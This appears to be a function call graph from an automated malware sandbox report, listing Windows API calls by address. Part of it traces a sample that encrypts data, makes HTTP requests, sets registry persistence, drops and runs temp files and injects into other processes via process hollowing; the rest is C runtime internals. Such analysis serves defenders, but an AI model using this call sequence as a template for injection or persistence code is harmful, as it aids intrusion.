12289->12278 12290 5d569b 12290->12279 12291 5d56a4 VirtualFree 12290->12291 12291->12279 12293 5d551b 12293->12290 12297 5d552c EnterCriticalSection 12293->12297 12294 5d547d VirtualFree 12300 5d54b1 12294->12300 12295->12278 12298 5d5096 12296->12298 12299 5d5041 lstrlenA 12296->12299 12301 5d558c VirtualAlloc 12297->12301 12302 5d5542 VirtualAlloc 12297->12302 12303 5d50a5 lstrlenA 12298->12303 12304 5d5104 12298->12304 12299->12278 12300->12293 12310 5d17d0 16 API calls 12300->12310 12308 5d568e LeaveCriticalSection 12301->12308 12309 5d55c7 GetTickCount 12301->12309 12305 5d5578 12302->12305 12303->12278 12306 5d5113 lstrlenA 12304->12306 12307 5d5172 12304->12307 12305->12308 12306->12278 12311 5d5181 lstrlenA 12307->12311 12312 5d51e0 12307->12312 12308->12290 12316 5d55da 12309->12316 12310->12300 12311->12278 12313 5d523f 12312->12313 12314 5d51ef lstrlenA 12312->12314 12313->12278 12315 5d9b90 QueryPerformanceCounter 12313->12315 12314->12278 12315->12278 12317 5d565c VirtualFree 12316->12317 12317->12308 12319 5d4b96 12318->12319 12320 5d4ad6 CoInitialize 12318->12320 12321 5d4ade 12320->12321 12322 5d4aeb WaitForSingleObject 12321->12322 12323 5d4b80 Sleep 12321->12323 12322->12323 12324 5d4b01 EnterCriticalSection 12322->12324 12323->12321 12408 5d8250 12324->12408 12327 5d4b50 12413 5d62b0 12327->12413 12330 5d4b90 CoUninitialize 12330->12319 12332 5d8387 12331->12332 12333 5d5344 12331->12333 12332->12333 12334 5d83b1 VirtualAlloc VirtualAlloc 12332->12334 12333->12279 12333->12280 12335 5d83e9 12334->12335 12336 5d8592 12334->12336 12335->12336 12354 5d8800 12335->12354 12337 5d85a9 12336->12337 12338 5d8598 VirtualFree 12336->12338 12337->12333 12340 5d85af VirtualFree 12337->12340 12338->12337 12340->12333 12346 5d847e 12376 5d8970 12346->12376 12348 5d8581 VirtualFree 12348->12336 12349 5d84ad 12349->12348 12351 5d181e 12350->12351 12352 5d17e1 12350->12352 12351->12290 12351->12293 12351->12294 12352->12351 12387 5d1840 12352->12387 12355 5d8420 12354->12355 12356 5d8817 12354->12356 12355->12336 12370 5d8770 12355->12370 12356->12355 12357 5d8821 CryptAcquireContextA 12356->12357 12358 5d887a 12357->12358 12359 5d8845 GetLastError 12357->12359 12358->12355 12362 5d8884 CryptGenKey 12358->12362 12360 5d8857 12359->12360 12361 5d8860 CryptAcquireContextA 12359->12361 12360->12358 12360->12361 12361->12358 12363 5d88bd CryptExportKey 12362->12363 12364 5d8950 CryptReleaseContext 12362->12364 12365 5d8946 CryptDestroyKey 12363->12365 12367 5d88d9 12363->12367 12364->12355 12365->12364 12366 5d893d 12366->12365 12367->12366 12368 5d88f1 CryptImportKey 12367->12368 12368->12366 12369 5d8916 CryptExportKey CryptDestroyKey 12368->12369 12369->12366 12371 5d87d0 QueryPerformanceCounter 12370->12371 12372 5d844b 12371->12372 12373 5d87d0 12372->12373 12374 5d8458 VirtualAlloc 12373->12374 12375 5d87e3 QueryPerformanceCounter 12373->12375 12374->12336 12374->12346 12375->12374 12377 5d8a60 12376->12377 12378 5d8987 12376->12378 12377->12349 12378->12377 12379 5d89a5 CryptAcquireContextA 12378->12379 12380 5d89fe 12379->12380 12381 5d89c9 GetLastError 12379->12381 12380->12377 12384 5d8a04 CryptImportKey 12380->12384 12382 5d89db 12381->12382 12383 5d89e4 CryptAcquireContextA 12381->12383 12382->12380 12382->12383 12383->12380 12385 5d8a29 CryptEncrypt CryptDestroyKey 12384->12385 12386 5d8a54 CryptReleaseContext 12384->12386 12385->12386 12386->12377 12388 5d1c95 12387->12388 12389 5d185a 12387->12389 12388->12351 12389->12388 12390 5d18ba InternetCrackUrlA 12389->12390 12390->12388 12391 5d1910 InternetOpenA 12390->12391 12391->12388 12392 5d1936 InternetConnectA 12391->12392 12393 5d196f HttpOpenRequestA 12392->12393 12394 5d1c88 InternetCloseHandle 12392->12394 12395 5d19ad wnsprintfA HttpAddRequestHeadersA 12393->12395 12396 5d1c7b InternetCloseHandle 12393->12396 12394->12388 12397 5d1c6e InternetCloseHandle 12395->12397 12398 5d19eb InternetSetOptionA 12395->12398 12396->12394 12397->12396 12407 5d1a30 12398->12407 12400 5d1a4d HttpSendRequestA 12401 5d1a7b HttpQueryInfoA 12400->12401 12400->12407 12401->12407 12402 5d1adc HttpQueryInfoA 12403 5d1b47 VirtualAlloc 12402->12403 12402->12407 12404 5d1c19 12403->12404 12403->12407 12405 5d1c23 InternetReadFile 12404->12405 12405->12405 12405->12407 12406 5d1b99 InternetReadFile 12406->12407 12407->12397 12407->12400 12407->12402 12407->12403 12407->12406 12409 5d4b37 LeaveCriticalSection 12408->12409 12412 5d8267 12408->12412 12409->12323 12409->12327 12410 5d82e7 StrStrA 12410->12409 12410->12412 12412->12409 12412->12410 12497 5d8090 12412->12497 12414 5d4b5d VirtualFree SetEvent 12413->12414 12415 5d62ca 12413->12415 12414->12330 12415->12414 12416 5d6427 12415->12416 12417 5d6399 12415->12417 12416->12414 12418 5d64ba GetEnvironmentVariableA 12416->12418 12423 5d65f3 12416->12423 12420 5d63a4 VirtualAlloc 12417->12420 12421 5d6410 12417->12421 12422 5d64e1 12418->12422 12419 5d6bdd 12425 5d6c13 12419->12425 12593 5da360 12419->12593 12424 5d640e 12420->12424 12433 5d63cc 12420->12433 12426 5d1ee0 2 API calls 12421->12426 12519 5d9730 12422->12519 12423->12419 12558 5d7250 12423->12558 12424->12416 12426->12424 12432 5d63fd VirtualFree 12432->12424 12433->12432 12516 5d1ee0 CreateThread 12433->12516 12434 5d6552 WriteFile 12435 5d65dd 12434->12435 12436 5d6588 12434->12436 12435->12423 12443 5d65e6 CloseHandle 12435->12443 12436->12435 12441 5d6593 CloseHandle 12436->12441 12437 5d6654 VirtualAlloc 12438 5d6752 12437->12438 12448 5d667a 12437->12448 12440 5d69ba GetEnvironmentVariableA 12438->12440 12444 5d678e VirtualAlloc 12438->12444 12445 5d6858 12438->12445 12447 5d69e1 12440->12447 12523 5d6c60 12441->12523 12443->12423 12449 5d6856 12444->12449 12461 5d67c6 12444->12461 12451 5d2070 32 API calls 12445->12451 12453 5d9730 QueryPerformanceCounter 12447->12453 12570 5d97a0 GetProcessHeap RtlAllocateHeap 12448->12570 12455 5d69a6 12449->12455 12459 5d6894 12449->12459 12460 5d6880 12449->12460 12451->12449 12457 5d69f2 GetTickCount GetTempFileNameA CreateFileA 12453->12457 12455->12440 12465 5d6a4f 12457->12465 12496 5d6bbd 12457->12496 12458 5d6698 CreateThread CloseHandle 12458->12438 12467 5d698a 12459->12467 12581 5d97a0 GetProcessHeap RtlAllocateHeap 12459->12581 12574 5d73c0 12460->12574 12462 5d6842 VirtualFree 12461->12462 12571 5d2070 12461->12571 12462->12449 12463 5d65c9 12535 5d74a0 12463->12535 12464 5d65d8 12470 5d6cf0 4 API calls 12464->12470 12471 5d6b1e WriteFile 12465->12471 12472 5d6a7b VirtualAlloc 12465->12472 12467->12455 12582 5d2510 12467->12582 12470->12435 12474 5d6b1c 12471->12474 12472->12474 12478 5d6aaf 12472->12478 12480 5d6bc9 CloseHandle 12474->12480 12483 5d6b59 CloseHandle 12474->12483 12487 5d6b08 VirtualFree 12478->12487 12488 5d6ad2 WriteFile 12478->12488 12480->12496 12481 5d68aa 12484 5d68e9 VirtualAlloc 12481->12484 12485 5d68ca 12481->12485 12482 5d6809 VirtualAlloc 12486 5d683f 12482->12486 12489 5d1e60 2 API calls 12483->12489 12484->12485 12490 5d690f 12484->12490 12485->12467 12492 5d693f CreateThread CloseHandle 12485->12492 12486->12462 12487->12474 12488->12487 12491 5d6b72 12489->12491 12490->12485 12493 5d6b9e 12491->12493 12494 5d73c0 5 API calls 12491->12494 12491->12496 12492->12467 12621 5d77b0 12492->12621 12495 5d2510 8 API calls 12493->12495 12493->12496 12494->12493 12495->12496 12496->12419 12498 5d8246 12497->12498 12499 5d80a7 12497->12499 12498->12412 12499->12498 12500 5d80c5 VirtualAlloc 12499->12500 12500->12498 12501 5d80eb 12500->12501 12509 5d1390 12501->12509 12503 5d8204 12503->12498 12504 5d8235 VirtualFree 12503->12504 12504->12498 12505 5d8100 12505->12503 12506 5d8a70 9 API calls 12505->12506 12507 5d81dd 12506->12507 12507->12503 12508 5d81e4 VirtualAlloc 12507->12508 12508->12503 12510 5d13ae 12509->12510 12511 5d139c 12509->12511 12510->12505 12511->12510 12512 5d13b6 GetProcessHeap RtlAllocateHeap 12511->12512 12512->12510 12514 5d13e4 12512->12514 12513 5d14e4 GetProcessHeap RtlFreeHeap 12513->12510 12514->12513 12515 5d1498 GetProcessHeap HeapFree 12514->12515 12515->12510 12517 5d1f0a WaitForSingleObject 12516->12517 12518 5d1f21 12516->12518 12517->12518 12518->12432 12520 5d9743 12519->12520 12521 5d64f2 GetTickCount GetTempFileNameA CreateFileA 12519->12521 12520->12521 12522 5d9763 QueryPerformanceCounter 12520->12522 12521->12423 12521->12434 12522->12520 12524 5d6c7c 12523->12524 12525 5d6c83 RegOpenKeyExA 12523->12525 12524->12525 12526 5d6ca7 12525->12526 12527 5d65ab 12525->12527 12528 5d9b90 QueryPerformanceCounter 12526->12528 12530 5d1e60 12527->12530 12529 5d6cae RegSetValueExA RegCloseKey 12528->12529 12529->12527 12531 5d1ece 12530->12531 12532 5d1e73 12530->12532 12531->12463 12531->12464 12533 5d1e90 CreateProcessA 12532->12533 12533->12531 12534 5d1ebe CloseHandle 12533->12534 12534->12531 12536 5d74bc 12535->12536 12537 5d74d2 Sleep 12536->12537 12538 5d750b 12537->12538 12539 5d74f5 GetModuleFileNameA 12537->12539 12541 5d7536 GetEnvironmentVariableA 12538->12541 12542 5d7520 GetAllUsersProfileDirectoryA 12538->12542 12540 5d7583 SetFileAttributesA wnsprintfA 12539->12540 12544 5d75d4 RegOpenKeyExA 12540->12544 12545 5d75c6 TerminateThread 12540->12545 12543 5d754d lstrcatA lstrcatA lstrcatA 12541->12543 12542->12543 12543->12540 12547 5d7649 12544->12547 12548 5d762a RegDeleteValueA RegCloseKey 12544->12548 12545->12544 12549 5d765e GetEnvironmentVariableA GetTickCount GetTempFileNameA lstrcatA CreateFileA 12547->12549 12550 5d5e30 6 API calls 12547->12550 12548->12547 12551 5d76df lstrlenA WriteFile CloseHandle 12549->12551 12552 5d65ce ExitProcess 12549->12552 12553 5d765b 12550->12553 12554 5d7731 12551->12554 12553->12549 12555 5d7744 CreateProcessA 12554->12555 12556 5d7796 CloseHandle 12555->12556 12557 5d77a3 ExitProcess 12555->12557 12556->12557 12559 5d6638 12558->12559 12560 5d7264 12558->12560 12559->12437 12559->12438 12560->12559 12561 5d72ad wsprintfA 12560->12561 12562 5d72df RegOpenKeyExA 12561->12562 12563 5d72d8 12561->12563 12562->12559 12564 5d7307 RegQueryValueExA 12562->12564 12563->12562 12565 5d73a5 RegCloseKey 12564->12565 12566 5d7333 12564->12566 12565->12559 12566->12565 12567 5d7339 GetLocalTime 12566->12567 12598 5d9910 SystemTimeToFileTime SystemTimeToFileTime 12567->12598 12569 5d7388 12569->12565 12570->12458 12600 5d20b0 12571->12600 12575 5d6891 12574->12575 12576 5d73d0 12574->12576 12575->12459 12576->12575 12577 5d7419 wsprintfA 12576->12577 12578 5d744b RegOpenKeyExA 12577->12578 12579 5d7444 12577->12579 12578->12575 12580 5d746f GetLocalTime RegSetValueExA RegCloseKey 12578->12580 12579->12578 12580->12575 12581->12481 12583 5d2527 12582->12583 12584 5d2573 12582->12584 12583->12584 12585 5d2531 VirtualAlloc 12583->12585 12584->12455 12585->12584 12586 5d257a VirtualAllocEx 12585->12586 12587 5d259f VirtualAllocEx 12586->12587 12589 5d25d7 12586->12589 12588 5d25bf VirtualFree 12587->12588 12587->12589 12588->12584 12590 5d2653 WriteProcessMemory 12589->12590 12591 5d2687 VirtualFree CreateRemoteThread 12590->12591 12592 5d2672 VirtualFree 12590->12592 12591->12584 12592->12584 12594 5da3ed 12593->12594 12595 5da370 12593->12595 12594->12425 12595->12594 12596 5da39b RegOpenKeyExA 12595->12596 12596->12594 12597 5da3bf RegSetValueExA RegCloseKey 12596->12597 12597->12594 12599 5d996b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 12598->12599 12599->12569 12601 5d20c3 GetEnvironmentVariableA lstrcatA 12600->12601 12602 5d2080 12600->12602 12603 5d20f2 lstrcatA lstrcatA 12601->12603 12604 5d2115 12601->12604 12602->12462 12602->12482 12603->12604 12605 5d2138 VirtualAlloc 12604->12605 12605->12602 12606 5d219d CreateProcessA 12605->12606 12607 5d21ca VirtualFree 12606->12607 12608 5d21e2 VirtualAllocEx 12606->12608 12607->12602 12609 5d2213 VirtualAllocEx 12608->12609 12611 5d227d 12608->12611 12610 5d223c TerminateProcess CloseHandle CloseHandle VirtualFree 12609->12610 12609->12611 12610->12602 12612 5d237b WriteProcessMemory 12611->12612 12613 5d23e1 VirtualFree GetThreadContext 12612->12613 12614 5d23a0 TerminateProcess CloseHandle CloseHandle VirtualFree 12612->12614 12615 5d2444 WriteProcessMemory 12613->12615 12616 5d2414 TerminateProcess CloseHandle CloseHandle 12613->12616 12614->12602 12617 5d246a TerminateProcess CloseHandle CloseHandle 12615->12617 12618 5d2497 SetThreadContext 12615->12618 12616->12602 12617->12602 12619 5d24d9 TerminateProcess CloseHandle CloseHandle 12618->12619 12620 5d24c4 ResumeThread 12618->12620 12619->12602 12620->12602 12622 5d77c0 CoInitialize 12621->12622 12623 5d78c3 12621->12623 12624 5d78bd CoUninitialize 12622->12624 12625 5d77e8 12622->12625 12624->12623 12626 5d77fc GetExitCodeProcess 12625->12626 12627 5d7898 VirtualFree 12625->12627 12628 5d7818 12626->12628 12629 5d788f 12626->12629 12630 5d97c0 2 API calls 12627->12630 12632 5d782e CloseHandle Sleep 12628->12632 12633 5d7821 Sleep 12628->12633 12629->12627 12631 5d78ba 12630->12631 12631->12624 12634 5d2070 32 API calls 12632->12634 12633->12629 12635 5d7851 12634->12635 12635->12629 12636 5d7863 12635->12636 12637 5d2510 8 API calls 12635->12637 12636->12627 12638 5d788c 12637->12638 12638->12629 11154 120b4b2 11155 120b4c3 11154->11155 11157 120b3b0 11154->11157 11177 1209c76 GetLastError 11157->11177 11159 120b3bd 11197 120b4cf 11159->11197 11161 120b3c5 11206 120b144 11161->11206 11164 120b3dc 11164->11155 11167 120b41f 11170 120a64e _free 20 API calls 11167->11170 11170->11164 11171 120b41a 11172 120951c __dosmaperr 20 API calls 11171->11172 11172->11167 11173 120b463 11173->11167 11230 120af97 11173->11230 11174 120b437 11174->11173 11175 120a64e _free 20 API calls 11174->11175 11175->11173 11178 1209c92 11177->11178 11179 1209c8c 11177->11179 11181 120a5f1 __dosmaperr 20 API calls 11178->11181 11183 1209ce1 SetLastError 11178->11183 11180 120a84b __dosmaperr 11 API calls 11179->11180 11180->11178 11182 1209ca4 11181->11182 11184 1209cac 11182->11184 11185 120a8a1 __dosmaperr 11 API calls 11182->11185 11183->11159 11186 120a64e _free 20 API calls 11184->11186 11187 1209cc1 11185->11187 11188 1209cb2 11186->11188 11187->11184 11189 1209cc8 11187->11189 11190 1209ced SetLastError 11188->11190 11191 1209ae8 __dosmaperr 20 API calls 11189->11191 11233 120a5ae 11190->11233 11192 1209cd3 11191->11192 11194 120a64e _free 20 API calls 11192->11194 11196 1209cda 11194->11196 11196->11183 11196->11190 11198 120b4db ___scrt_is_nonwritable_in_current_image 11197->11198 11199 1209c76 _abort 35 API calls 11198->11199 11200 120b4e5 11199->11200 11202 120a5ae _abort 35 API calls 11200->11202 11204 120b569 ___scrt_is_nonwritable_in_current_image 11200->11204 11205 120a64e _free 20 API calls 11200->11205 11387 120aef5 EnterCriticalSection 11200->11387 11388 120b560 11200->11388 11202->11200 11204->11161 11205->11200 11392 120afbf 11206->11392 11209 120b165 GetOEMCP 11212 120b18e 11209->11212 11210 120b177 11211 120b17c GetACP 11210->11211 11210->11212 11211->11212 11212->11164 11213 120c4e6 11212->11213 11214 120c524 11213->11214 11218 120c4f4 __dosmaperr 11213->11218 11216 120951c __dosmaperr 20 API calls 11214->11216 11215 120c50f RtlAllocateHeap 11217 120b3ed 11215->11217 11215->11218 11216->11217 11217->11167 11220 120b571 11217->11220 11218->11214 11218->11215 11219 120c082 __dosmaperr 7 API calls 11218->11219 11219->11218 11221 120b144 37 API calls 11220->11221 11222 120b590 11221->11222 11225 120b5e1 IsValidCodePage 11222->11225 11227 120b597 11222->11227 11229 120b606 ___scrt_get_show_window_mode 11222->11229 11223 120d415 _ValidateLocalCookies 5 API calls 11224 120b412 11223->11224 11224->11171 11224->11174 11226 120b5f3 GetCPInfo 11225->11226 11225->11227 11226->11227 11226->11229 11227->11223 11429 120b21c GetCPInfo 11229->11429 11505 120af54 11230->11505 11232 120afbb 11232->11167 11244 120be0b 11233->11244 11237 120a5c8 IsProcessorFeaturePresent 11241 120a5d3 11237->11241 11238 120a5e6 11278 120bcbb 11238->11278 11240 120a5be 11240->11237 11240->11238 11272 12096f7 11241->11272 11281 120bd79 11244->11281 11247 120be66 11248 120be72 _abort 11247->11248 11249 1209cfa __dosmaperr 20 API calls 11248->11249 11252 120be9f _abort 11248->11252 11255 120be99 _abort 11248->11255 11249->11255 11250 120beeb 11251 120951c __dosmaperr 20 API calls 11250->11251 11253 120bece _abort 11251->11253 11258 120bf17 11252->11258 11295 120aef5 EnterCriticalSection 11252->11295 11304 120d869 11253->11304 11255->11250 11255->11252 11255->11253 11259 120bf76 11258->11259 11262 120bf6e 11258->11262 11269 120bfa1 11258->11269 11296 120af3d LeaveCriticalSection 11258->11296 11259->11269 11297 120be5d 11259->11297 11264 120bcbb _abort 28 API calls 11262->11264 11264->11259 11266 1209c76 _abort 35 API calls 11270 120c004 11266->11270 11268 120be5d _abort 35 API calls 11268->11269 11300 120c026 11269->11300 11270->11253 11271 1209c76 _abort 35 API calls 11270->11271 11271->11253 11273 1209713 _abort ___scrt_get_show_window_mode 11272->11273 11274 120973f IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 11273->11274 11277 1209810 _abort 11274->11277 11275 120d415 _ValidateLocalCookies 5 API calls 11276 120982e 11275->11276 11276->11238 11277->11275 11308 120baca 11278->11308 11284 120bd1f 11281->11284 11283 120a5b3 11283->11240 11283->11247 11285 120bd2b ___scrt_is_nonwritable_in_current_image 11284->11285 11290 120aef5 EnterCriticalSection 11285->11290 11287 120bd39 11291 120bd6d 11287->11291 11289 120bd60 ___scrt_is_nonwritable_in_current_image 11289->11283 11290->11287 11294 120af3d LeaveCriticalSection 11291->11294 11293 120bd77 11293->11289 11294->11293 11295->11258 11296->11262 11298 1209c76 _abort 35 API calls 11297->11298 11299 120be62 11298->11299 11299->11268 11301 120c02c 11300->11301 11303 120bff5 11300->11303 11307 120af3d LeaveCriticalSection 11301->11307 11303->11253 11303->11266 11303->11270 11305 120d415 _ValidateLocalCookies 5 API calls 11304->11305 11306 120d874 11305->11306 11306->11306 11307->11303 11309 120bad6 _abort 11308->11309 11310 120baee 11309->11310 11330 120d718 GetModuleHandleW 11309->11330 11339 120aef5 EnterCriticalSection 11310->11339 11314 120bb94 11347 120bbd4 11314->11347 11318 120bb6b 11320 120bb83 11318->11320 11343 120ca18 11318->11343 11319 120baf6 11319->11314 11319->11318 11340 120ce41 11319->11340 11326 120ca18 _abort 5 API calls 11320->11326 11321 120bbb1 11350 120bbe3 11321->11350 11322 120bbdd 11324 120d869 _abort 5 API calls 11322->11324 11329 120a5f0 11324->11329 11326->11314 11331 120bae2 11330->11331 11331->11310 11332 120bc24 GetModuleHandleExW 11331->11332 11333 120bc4e GetProcAddress 11332->11333 11336 120bc63 11332->11336 11333->11336 11334 120bc80 11337 120d415 _ValidateLocalCookies 5 API calls 11334->11337 11335 120bc77 FreeLibrary 11335->11334 11336->11334 11336->11335 11338 120bc8a 11337->11338 11338->11310 11339->11319 11358 120cb5b 11340->11358 11344 120ca47 11343->11344 11345 120d415 _ValidateLocalCookies 5 API calls 11344->11345 11346 120ca70 11345->11346 11346->11320 11380 120af3d LeaveCriticalSection 11347->11380 11349 120bbad 11349->11321 11349->11322 11381 120aa66 11350->11381 11353 120bc11 11356 120bc24 _abort 8 API calls 11353->11356 11354 120bbf1 GetPEB 11354->11353 11355 120bc01 GetCurrentProcess TerminateProcess 11354->11355 11355->11353 11357 120bc19 ExitProcess 11356->11357 11361 120cb0a 11358->11361 11360 120cb7f 11360->11318 11362 120cb16 ___scrt_is_nonwritable_in_current_image 11361->11362 11369 120aef5 EnterCriticalSection 11362->11369 11364 120cb24 11370 120cbca 11364->11370 11368 120cb42 ___scrt_is_nonwritable_in_current_image 11368->11360 11369->11364 11371 120cbf2 11370->11371 11372 120cbea 11370->11372 11371->11372 11375 120a64e _free 20 API calls 11371->11375 11373 120d415 _ValidateLocalCookies 5 API calls 11372->11373 11374 120cb31 11373->11374 11376 120cb4f 11374->11376 11375->11372 11379 120af3d LeaveCriticalSection 11376->11379 11378 120cb59 11378->11368 11379->11378 11380->11349 11382 120aa81 11381->11382 11383 120aa8b 11381->11383 11385 120d415 _ValidateLocalCookies 5 API calls 11382->11385 11384 120a688 __dosmaperr 5 API calls 11383->11384 11384->11382 11386 120aae9 11385->11386 11386->11353 11386->11354 11387->11200 11391 120af3d LeaveCriticalSection 11388->11391 11390 120b567 11390->11200 11391->11390 11393 120afd2 11392->11393 11394 120afdc 11392->11394 11393->11209 11393->11210 11394->11393 11395 1209c76 _abort 35 API calls 11394->11395 11396 120affd 11395->11396 11400 120c998 11396->11400 11401 120b016 11400->11401 11402 120c9ab 11400->11402 11404 120c9c5 11401->11404 11402->11401 11408 120aded 11402->11408 11405 120c9d8 11404->11405 11407 120c9ed 11404->11407 11406 120b4cf __fassign 35 API calls 11405->11406 11405->11407 11406->11407 11407->11393 11409 120adf9 ___scrt_is_nonwritable_in_current_image 11408->11409 11410 1209c76 _abort 35 API calls 11409->11410 11411 120ae02 11410->11411 11414 120ae50 ___scrt_is_nonwritable_in_current_image 11411->11414 11420 120aef5 EnterCriticalSection 11411->11420 11413 120ae20 11421 120ae64 11413->11421 11414->11401 11419 120a5ae _abort 35 API calls 11419->11414 11420->11413 11422 120ae34 11421->11422 11423 120ae72 __fassign 11421->11423 11425 120ae53 11422->11425 11423->11422 11424 120aba0 __fassign 20 API calls 11423->11424 11424->11422 11428 120af3d LeaveCriticalSection 11425->11428 11427 120ae47 11427->11414 11427->11419 11428->11427 11430 120b300 11429->11430 11435 120b256 11429->11435 11432 120d415 _ValidateLocalCookies 5 API calls 11430->11432 11434 120b3ac 11432->11434 11434->11227 11439 120c534 11435->11439 11438 120c88e 41 API calls 11438->11430 11440 120afbf __fassign 35 API calls 11439->11440 11441 120c554 MultiByteToWideChar 11440->11441 11443 120c592 11441->11443 11450 120c62a 11441->11450 11446 120c4e6 __onexit 21 API calls 11443->11446 11451 120c5b3 __alloca_probe_16 ___scrt_get_show_window_mode 11443->11451 11444 120d415 _ValidateLocalCookies 5 API calls 11447 120b2b7 11444->11447 11445 120c624 11458 120c651 11445->11458 11446->11451 11453 120c88e 11447->11453 11449 120c5f8 MultiByteToWideChar 11449->11445 11452 120c614 GetStringTypeW 11449->11452 11450->11444 11451->11445 11451->11449 11452->11445 11454 120afbf __fassign 35 API calls 11453->11454 11455 120c8a1 11454->11455 11462 120c671 11455->11462 11459 120c65d 11458->11459 11460 120c66e 11458->11460 11459->11460 11461 120a64e _free 20 API calls 11459->11461 11460->11450 11461->11460 11463 120c68c 11462->11463 11464 120c6b2 MultiByteToWideChar 11463->11464 11465 120c866 11464->11465 11466 120c6dc 11464->11466 11467 120d415 _ValidateLocalCookies 5 API calls 11465->11467 11471 120c4e6 __onexit 21 API calls 11466->11471 11473 120c6fd __alloca_probe_16 11466->11473 11468 120b2d8 11467->11468 11468->11438 11469 120c746 MultiByteToWideChar 11470 120c7b2 11469->11470 11472 120c75f 11469->11472 11475 120c651 __freea 20 API calls 11470->11475 11471->11473 11489 120a95c 11472->11489 11473->11469 11473->11470 11475->11465 11477 120c7c1 11479 120c4e6 __onexit 21 API calls 11477->11479 11483 120c7e2 __alloca_probe_16 11477->11483 11478 120c789 11478->11470 11480 120a95c 12 API calls 11478->11480 11479->11483 11480->11470 11481 120c857 11482 120c651 __freea 20 API calls 11481->11482 11482->11470 11483->11481 11484 120a95c 12 API calls 11483->11484 11485 120c836 11484->11485 11485->11481 11486 120c845 WideCharToMultiByte 11485->11486 11486->11481 11487 120c885 11486->11487 11488 120c651 __freea 20 API calls 11487->11488 11488->11470 11490 120a688 __dosmaperr 5 API calls 11489->11490 11491 120a983 11490->11491 11492 120a9b3 11491->11492 11493 120a98c LCMapStringEx 11491->11493 11500 120a9e4 11492->11500 11497 120a9d3 11493->11497 11498 120d415 _ValidateLocalCookies 5 API calls 11497->11498 11499 120a9de 11498->11499 11499->11470 11499->11477 11499->11478 11501 120a688 __dosmaperr 5 API calls 11500->11501 11502 120aa0b 11501->11502 11503 120d415 _ValidateLocalCookies 5 API calls 11502->11503 11504 120a9cc LCMapStringW 11503->11504 11504->11497 11506 120af60 ___scrt_is_nonwritable_in_current_image 11505->11506 11513 120aef5 EnterCriticalSection 11506->11513 11508 120af6a 11514 120b042 11508->11514 11512 120af83 ___scrt_is_nonwritable_in_current_image 11512->11232 11513->11508 11526 120b762 11514->11526 11516 120b090 11517 120b762 20 API calls 11516->11517 11518 120b0ac 11517->11518 11519 120b762 20 API calls 11518->11519 11520 120b0ca 11519->11520 11521 120af77 11520->11521 11522 120a64e _free 20 API calls 11520->11522 11523 120af8b 11521->11523 11522->11521 11536 120af3d LeaveCriticalSection 11523->11536 11525 120af95 11525->11512 11527 120b773 11526->11527 11535 120b76f _abort 11526->11535 11528 120b77a 11527->11528 11530 120b78d ___scrt_get_show_window_mode 11527->11530 11529 120951c __dosmaperr 20 API calls 11528->11529 11529->11535 11531 120b7c4 11530->11531 11532 120b7bb 11530->11532 11530->11535 11534 120951c __dosmaperr 20 API calls 11531->11534 11531->11535 11533 120951c __dosmaperr 20 API calls 11532->11533 11533->11535 11534->11535 11535->11516 11536->11525 10907 120d291 10912 120d75c SetUnhandledExceptionFilter 10907->10912 10909 120d296 pre_c_initialization 10913 120c11e 10909->10913 10911 120d2a1 10912->10909 10914 120c144 10913->10914 10915 120c12a 10913->10915 10914->10911 10915->10914 10918 120951c 10915->10918 10917 120c134 _abort 10917->10911 10921 1209cfa GetLastError 10918->10921 10922 1209d13 10921->10922 10923 1209d19 10921->10923 10940 120a84b 10922->10940 10927 1209d70 SetLastError 10923->10927 10947 120a5f1 10923->10947 10929 1209521 10927->10929 10929->10917 10930 1209d33 10954 120a64e 10930->10954 10933 1209d39 10935 1209d67 SetLastError 10933->10935 10934 1209d4f 10967 1209ae8 10934->10967 10935->10929 10938 120a64e _free 17 API calls 10939 1209d60 10938->10939 10939->10927 10939->10935 10972 120a688 10940->10972 10943 120a88a TlsGetValue 10944 120a87e 10943->10944 10979 120d415 10944->10979 10946 120a89b 10946->10923 10952 120a5fe __dosmaperr 10947->10952 10948 120a63e 10950 120951c __dosmaperr 19 API calls 10948->10950 10949 120a629 RtlAllocateHeap 10951 1209d2b 10949->10951 10949->10952 10950->10951 10951->10930 10960 120a8a1 10951->10960 10952->10948 10952->10949 10994 120c082 10952->10994 10955 120a659 HeapFree 10954->10955 10959 120a682 __dosmaperr 10954->10959 10956 120a66e 10955->10956 10955->10959 10957 120951c __dosmaperr 18 API calls 10956->10957 10958 120a674 GetLastError 10957->10958 10958->10959 10959->10933 10961 120a688 __dosmaperr 5 API calls 10960->10961 10962 120a8c8 10961->10962 10963 120a8e3 TlsSetValue 10962->10963 10964 120a8d7 10962->10964 10963->10964 10965 120d415 _ValidateLocalCookies 5 API calls 10964->10965 10966 1209d48 10965->10966 10966->10930 10966->10934 11010 1209ac0 10967->11010 10973 120a6b8 10972->10973 10976 120a6b4 10972->10976 10973->10943 10973->10944 10974 120a6d8 10974->10973 10977 120a6e4 GetProcAddress 10974->10977 10976->10973 10976->10974 10986 120a724 10976->10986 10978 120a6f4 try_get_function 10977->10978 10978->10973 10980 120d420 IsProcessorFeaturePresent 10979->10980 10981 120d41e 10979->10981 10983 120d8e8 10980->10983 10981->10946 10993 120d8ac SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 10983->10993 10985 120d9cb 10985->10946 10987 120a745 LoadLibraryExW 10986->10987 10988 120a73a 10986->10988 10989 120a762 GetLastError 10987->10989 10990 120a77a 10987->10990 10988->10976 10989->10990 10991 120a76d LoadLibraryExW 10989->10991 10990->10988 10992 120a791 FreeLibrary 10990->10992 10991->10990 10992->10988 10993->10985 10999 120c0c6 10994->10999 10996 120d415 _ValidateLocalCookies 5 API calls 10997 120c0c2 10996->10997 10997->10952 10998 120c098 10998->10996 11000 120c0d2 ___scrt_is_nonwritable_in_current_image 10999->11000 11005 120aef5 EnterCriticalSection 11000->11005 11002 120c0dd 11006 120c10f 11002->11006 11004 120c104 ___scrt_is_nonwritable_in_current_image 11004->10998 11005->11002 11009 120af3d LeaveCriticalSection 11006->11009 11008 120c116 11008->11004 11009->11008 11016 1209a00 11010->11016 11012 1209ae4 11013 1209a70 11012->11013 11027 1209904 11013->11027 11015 1209a94 11015->10938 11017 1209a0c ___scrt_is_nonwritable_in_current_image 11016->11017 11022 120aef5 EnterCriticalSection 11017->11022 11019 1209a16 11023 1209a3c 11019->11023 11021 1209a34 ___scrt_is_nonwritable_in_current_image 11021->11012 11022->11019 11026 120af3d LeaveCriticalSection 11023->11026 11025 1209a46 11025->11021 11026->11025 11028 1209910 ___scrt_is_nonwritable_in_current_image 